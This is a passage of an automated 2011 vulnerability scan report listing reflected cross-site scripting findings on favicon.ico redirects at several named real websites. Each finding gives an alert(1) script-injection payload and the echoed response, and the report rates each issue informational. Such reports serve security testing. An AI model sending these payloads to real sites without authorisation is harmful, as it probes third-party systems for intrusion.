HTTP/1.1 302 Object moved Connection: close Date: Thu, 31 Mar 2011 21:59:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Length: 200 Location: http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1 Cache-Control: private Content-Type: text/html
<head><title>Object moved</title></head><body><h1>Object Moved</h1>This object may be found <a HREF="http://SearchWarp.com/favicon.ico?4961c"><script>alert(1)</script>13e487883c7=1">here</a>.</body>
1.157. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.shop.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload d52ff><script>alert(1)</script>1d2e9c7eb57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.158. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.shop.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4308b"><script>alert(1)</script>a443b43ef30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.159. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.shopcompanion.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac848"><script>alert(1)</script>82d79a60015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.160. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.shopcompanion.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3b792><script>alert(1)</script>70fe5a6514e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
1.161. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.tangle.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4eea4<script>alert(1)</script>5dcabf655e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar">http://www.godtube.com/favicon.ico?4eea4<script>alert(1)</script>5dcabf655e=1#alertbar</a> ...[SNIP]...
1.162. http://www.tangle.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.tangle.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8503"><script>alert(1)</script>da2d2489d32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://www.godtube.com/favicon.ico?b8503"><script>alert(1)</script>da2d2489d32=1#alertbar">http://www.godtube.com/favicon ...[SNIP]...
1.163. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.townhall.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2ebc1<script>alert(1)</script>46f88b55933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1">http://townhall.com/favicon.ico?2ebc1<script>alert(1)</script>46f88b55933=1</a> ...[SNIP]...
1.164. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.townhall.com
Path:
/favicon.ico
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 582da"><script>alert(1)</script>c977a78f916 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/favicon.ico?582da"><script>alert(1)</script>c977a78f916=1">http://townhall.com/favicon.ico?582da"><sc ...[SNIP]...
Report generated by XSS.CX at Thu Mar 31 18:33:35 CDT 2011.